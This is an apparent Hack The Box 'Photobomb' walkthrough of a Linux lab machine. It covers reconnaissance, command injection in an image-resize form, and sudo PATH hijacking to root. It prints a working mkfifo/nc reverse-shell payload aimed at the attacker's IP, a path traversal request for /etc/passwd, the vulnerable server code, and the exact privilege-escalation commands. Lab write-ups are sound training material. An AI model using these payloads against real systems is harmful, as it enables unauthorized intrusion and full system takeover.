Photobomb

Easy - Linux

Recon

~/htb/labs/Photobomb $ sudo nmap -T4 -sC -sV -O 10.10.11.182 -oN nmap.txt

nmap.txt

Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-05 15:57 CST
Nmap scan report for 10.10.11.182
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=12/5%OT=22%CT=1%CU=34665%PV=Y%DS=2%DC=I%G=Y%TM=638E699
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(CI=Z)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O
OS:5=M539ST11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.18 seconds

/etc/hosts

10.10.11.182    photobomb.htb

$ nikto -h photobomb.htb
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.11.182
+ Target Hostname:    photobomb.htb
+ Target Port:        80
+ Start Time:         2022-12-05 16:33:14 (GMT-6)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-content-type-options' found, with contents: nosniff
+ Uncommon header 'x-xss-protection' found, with contents: 1; mode=block
+ Uncommon header 'x-cascade' found, with contents: pass
+ No CGI Directories found (use '-C all' to force check all possible dirs)

Web Server

The home page (http://photobomb.htb/) contains a link to /printer, yet this asks for HTTP basic authentication. Let's keep looking.

photobomb.js includes a regex check for a specific cookie and sets the needed credentials to access /printer:

photobomb.js

// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','REDACTED');
  }

You could set the cookie with document.cookie and reload the page or copy the creds and log in manually. Either way, logging in, we see a simple form. You pick a picture, pick the file type, size, then Download. Looking at DevTools Network tab, the Download button sends a POST request to /printer with these queries:

photo=mark-mc-neill-4xWHIpY2QcY-unsplash.jpg
filetype=jpg
dimensions=30x20

The photo field suggests a possible path traversal attack. Let's test it with BurpSuite.

Request

POST /printer HTTP/1.1
Host: photobomb.htb
Content-Length: 79
...
Content-Type: application/x-www-form-urlencoded
Cookie: isPhotoBombTechSupport=TRUE
special-dev: only4dev
Authorization: Basic REDACTED
Connection: close

photo=../../../../../../../../../../../etc/passwd&filetype=png&dimensions=30x20

Response

HTTP/1.1 500 Internal Server Error
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Dec 2022 22:26:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14
Connection: close
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN

Invalid photo.

After a few tries in BurpSuite's Repeater trying different URL encoded and unencoded parameter values for photo, I couldn't get a good response other than a 500. Time to look harder.

How about the other params? It's possible these params are arguments to a command call such as ffmpeg or ImageMagick convert. How about some good ol' RCE exploitation?

Raw payload

rm /tmp/s;mkfifo /tmp/s;cat /tmp/s|bash -i 2>&1|nc 10.10.16.52 4242>/tmp/s

Let's open up a nc listener on our machine, encode the payload for URL, append it into the filetype query field, and see if it works.

$ nc -lvkp 4242
listening on [any] 4242 ...
connect to [10.10.16.52] from photobomb.htb [10.10.11.182] 59346
bash: cannot set terminal process group (700): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$

After trying a couple of different payloads, this mkfifo pipe seemed to work. You can see the payload description and comments here.

Loot Gathering

Now that we have a bash shell in the wizard user, we should look around. For curiosity sake, I looked at the server.rb file to check out the vulnerabilities we exploited.

~/photobomb/server.rb

...
  if !filetype.match(/^(png|jpg)/) # Weak regex
    halt 500, 'Invalid filetype.'
  end
  filename = photo.sub('.jpg', '') + '_' + dimensions + '.' + filetype

...

  if !File.exists?('resized_images/' + filename)
    # the parameters are unsafely used in a system() call, thus allowing RCE injection
    command = 'convert source_images/' + photo + ' -resize ' + dimensions + ' resized_images/' + filename
    system(command)
    ...
  end

Alright, back to looting. Heading over to wizard's home directory, we can grab the user flag and move on to root.

Privilege Escalation

I thought about spinning up LinPEAS and then kick back, but I wanted to learn more about privilege escalation within a Linux box. Time to go through the Linux Privilege Escalation Checklist

Nothing too interesting from printenv. Let's get OS info and move on to enumerating possible kernel exploits.

$ uname -a
Linux photobomb 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

Searchsploit didn't give anything promising for Linux kernel 5.4.0, but I might come back later. For now, let's try linux-exploit-suggester

Possible Exploits:

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
...

A bunch of results. Let's also come back to that later. We'll continue down the list. How about checking sudo privileges?

wizard@photobomb:~$ sudo -l
...

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

SETENV will preserve the sudoer's (in this case, wizard) environment. Keep note of that. And of course, sudo will not ask for a password executing this script with the NOPASSWD flag. Wonderful.

/opt/cleanup.sh

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Alright, we see something interesting here. If you look closely, most of these commands have absolute paths to their binaries. I'm gonna assume these are not writeable. But that find call is not an absolute call? Let's do some unsafe PATH environment manipulation knowing sudo is preserving the user's environment when it goes privileged.

wizard@photobomb:~$ echo bash > ./find
wizard@photobomb:~$ chmod +x find
wizard@photobomb:~$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
# id
uid=0(root) gid=0(root) groups=0(root)
# ls /root
root.txt

Well that was easy enough, on to the next machine!